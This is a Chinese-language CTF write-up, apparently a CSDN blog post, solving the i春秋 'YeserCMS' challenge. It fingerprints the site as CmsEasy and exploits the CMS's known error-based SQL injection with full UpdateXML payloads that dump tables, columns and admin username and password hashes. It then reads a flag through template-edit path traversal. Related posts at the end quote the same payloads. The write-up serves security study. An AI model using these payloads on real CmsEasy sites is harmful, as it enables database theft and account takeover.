i春秋-百度杯九月场-YeserCMS

最新推荐文章于 2020-04-14 10:23:23 发布
最新推荐文章于 2020-04-14 10:23:23 发布
阅读量1.3k 收藏
点赞数
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/104422796
版权

首先,拿到这种cms的题,

1,要先判断是什么类型的cms
2,搜索这种cms的漏洞。
3,利用该漏洞

一,判断cms:

1,在该站内找找有没有什么标识,这道题的标识在下载处有cmseasy
在这里插入图片描述
2,搜索手机版 - 购物车 - 留言 - 繁体 - 注册 / 登陆,可以在网上找到一大堆相同cms的网站。
在这里插入图片描述
在下方找到了cms名字:
在这里插入图片描述
3,看到这里有详细的信息,百度一下。
在这里插入图片描述
在这里插入图片描述

二,查找easycms曾经出现的漏洞

发送url:

http://localhost/Cmseasy/celive/live/header.php



postdata:

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx
%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520cmseasy_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>

直接利用漏洞注入:
爆库:

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((select/**/group_concat(database()) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

在这里插入图片描述

爆表,每次只能加31

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((select/**/group_concat(table_name)  from information_schema.tables where table_schema=database()),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((select/**/group_concat(table_name)  from information_schema.tables where table_schema=database()),32,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

在这里插入图片描述

[yesercms_a_attachment,yesercms_a_comment,yesercms_a_rank,yesercms_a_vote,yesercms_activity,yesercms_announcement,yesercms_archive,yesercms_assigns,yesercms_b_arctag,yesercms_b_area,yesercms_b_category,yesercms_b_special,yesercms_b_tag,yesercms_ballot,yesercms_bbs_archive,yesercms_bbs_category,yesercms_bbs_label,yesercms_bbs_reply,yesercms_chat,yesercms_departments,yesercms_de

这里表太多了,看了看writeup都是直接用的yesercms_user表,,,难道是我头太铁了

2,爆字段

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((select/**/group_concat(column_name) from information_schema.columns where table_name='yesercms_user'),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

在这里插入图片描述

3,爆字段类容

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((select/**/group_concat(username,password) from yesercms_user),32,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>            

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((select/**/group_concat(username,password) from yesercms_user),32,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

在这里插入图片描述
在这里插入图片描述

adminff512d4240cbbdeafada404677ccbe61
md5解密
admin-Yeser231

登录:
在这里插入图片描述

做到这里就不知道怎么做了,看了看题解才知道要抓模板->当前模板编辑->编辑的包
在这里插入图片描述在这里插入图片描述

修改文件为../../flag.php
在这里插入图片描述

天问_Herbert555
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
i春秋python_i春秋CTF-YeserCMS
weixin_29707757的博客
01-14 157
分析打开网站,在文档下载页面用户评论区域,发现是一个EasyCMS访问url/celive/live/header.php,直接进行报错注入数据库:xajax=Postdata&xajaxargs[0]=detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32...
i春秋CTF-YeserCMS
苟有恒,必有三更眠,五更起。
09-06 797
分析 打开网站,在文档下载页面用户评论区域,发现是一个EasyCMS 于是百度EasyCMS的漏洞,发现cmseasy 无限制报错注入(可获取全站信息exp) 访问url/celive/live/header.php,直接进行报错注入 数据库: xajax=Postdata&amp;xajaxargs[0]=&lt;xjxquery&gt;&...
i春秋-百度九月-YeserCMS(cmseasy的UpdateXML注入漏洞)
weixin_30764137的博客
03-09 902
学习了大佬们的操作才做出来,记录一次菜鸡的无能为力。 tips:flag在网站根目录下的flag.php中。我们的目标就是flag.php了。 题目说是心的CMSYeserCMS,然而百度一下,出来该题的wp之外,并没有这个CMS。可能是把原来的CMS改名了,在网站中找看看有没有什么线索,最后发现有cmseasy的标识: 于是百度寻找cmseasy的漏...
YeserCMS
weixin_30371875的博客
07-24 220
这道题直接让我们查网站根目录的flag,我首先想到的是一句话木马,但是奈何找不到上传的接口啊,只好作罢, 在下载发现有个cmseasy的标识,明显是要提示我们这里是easycms百度easycms的漏洞然后注入 注入点: http://cac6d32bf8ff4b52becb3516148c9c106deeaa1e92b64a8e.changame.ichunqiu.com//celive...
i春秋百度”CTF比赛 九月 YeserCMS
include_heqile的博客
09-08 1304
https://www.ichunqiu.com/battalion?t=1 首先说明一点,这题怒是我自己做出来的,我参考了很多博主的writeup,但是他们的writeup只是提示我应该去利用什么漏洞: https://www.w00yun.top/bugs/wooyun-2015-0137013.html 虽然知道了是这个漏洞,但是我不会利用,在这上面耗了很长时间,因为我直接把漏洞报...
Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想
04-30
Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想 i春秋技术分享,将self-xss利用扩大化,奇思妙想可以借鉴。
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。...
i 春秋月刊 第 1 期到第 5 期
11-16
《i春秋月刊》系列是针对信息技术领域,特别是网络安全与编程技术的一套综合期刊,涵盖了从基础编程语言到高级安全话题的广泛内容。这五期的主题分别为:Python应用、代码审计、SQL注入和XSS攻击,这些都是IT行业中...
购物车设计与实现(用户登录、注册、管理员登陆、显示商品)
10-29
用户登录、注册、管理员登陆、显示商品、添加到购物车功能。
php注册登录系统简化版
10-22
主要为大家详细介绍了php注册登录系统简化版的实现步骤,感兴趣的小伙伴们可以参考一下
HTML+CSS+JS手机端购物车demo
10-18
HTML+CSS+JS手机端购物车demo,获取json数据实例,使用vue渲染列表,样式随便写的
百度”CTF比赛 九月_YeserCMS
a173262565的博客
04-14 206
题目在i春秋ctf大本营 题目的提示并没有什么卵用,打开链接发现其实是easycms百度可以查到许多通用漏洞 这里我利用的是无限报错注入 访问url/celive/live/header.php,直接进行报错注入 xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(Updat...
百度”CTF比赛 九月--YeserCMS
Oavinci的博客
03-22 545
正在上传…重新上传取消 在文档下载的评论区发现是EASYCMS 正在上传…重新上传取消 百度EASYCMS存在的漏洞,发现存在无限制报错注入,可获取全站信息 漏洞参考:https://www.w00yun.top/bugs/wooyun-2015-0137013.html 访问/celive/live/header.php进行报错注入 爆数据库,得到“Yeser...
百度”CTF比赛 九月 YeserCMS
weixin_30852451的博客
06-13 227
打开题目 进入后是一个cms,但肯定的是这个cms不叫yesercms 于是我们开始随便翻翻,寻找信息,后台我也看了除了一个登陆界面,就没有其他的提示信息。 最后在文档下载的评论栏里发现,这个cms的真正名称是cmseasy。 上网去查cmseasy的漏洞 然后大致查了下应该是sql注入漏洞 于是构造报错注入测试一下 回显内容,还告诉了我们这个sql语句的完整内容,总...
i春秋百度”CTF比赛 九月 再见CMS
include_heqile的博客
09-11 2316
https://www.ichunqiu.com/battalion?t=1&amp;r=0 这道题刚做的时候是没有头绪的,看了一眼writeup,得知要通过网站下方的备案记录来查询除网站相关信息,并进而得知该网站使用的的cms,但是我照着做的时候却查不出来结果,ICP/IP官网返回说无匹配信息,于是我就参考writeup直接搜索了齐博CMS的相关漏洞,我使用的是这一个: http://0d...
百度”CTF比赛 九月YeserCMS
sssvvf的博客
10-15 339
百度”CTF比赛 九月YeserCMS 打开网站,看见YESERCMS,查了下好像没有这个CMS,直接CMS指纹识别一下,发现是CMSEASY。 网上找相关GETSHELL漏洞,发现一个伪造IP进入后台的洞,但是PING不通,暂时无法获得准确的IP地址,最后在http://www.hacksec.cn/codesec/378.html博客上发现SQL注入漏洞。 POC: h...
百度”CTF比赛 九月 YeserCMS 详细解析
drip_big的博客
04-14 794
百度”CTF比赛 九月 YeserCMS 详细解析 看题解的,对每个关键步骤做出详细注释 题目内容: 新的CMS系统,帮忙测测是否有漏洞。 1 第一步就是了解这是什么cms 百度YeserCMS,没有相关CMS,应该是改了名字。 在网站内找一找,没看到哪里有标志信息,一下几种方式可以辨认 直接用浏览器搜索cms指纹识别 搜索 “手机版 - 购物车 - 留言 - 繁体 - ...
再见CMS
weixin_30535167的博客
07-24 174
观察网站最下方,根据备案号搜到这是个齐博CMS,然后百度就可以搜到齐博CMS漏洞了 然后开始利用 首先尝试了在用户信息修改处进行注入,发现好像想不通了,就在博客界面进行注入 Payload: 获取版本信息 http://2743f65d1ee44b2dbed1eee0a12863d3fa07aa9eccab467e.changame.ichunqiu.com/blog/index.p...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值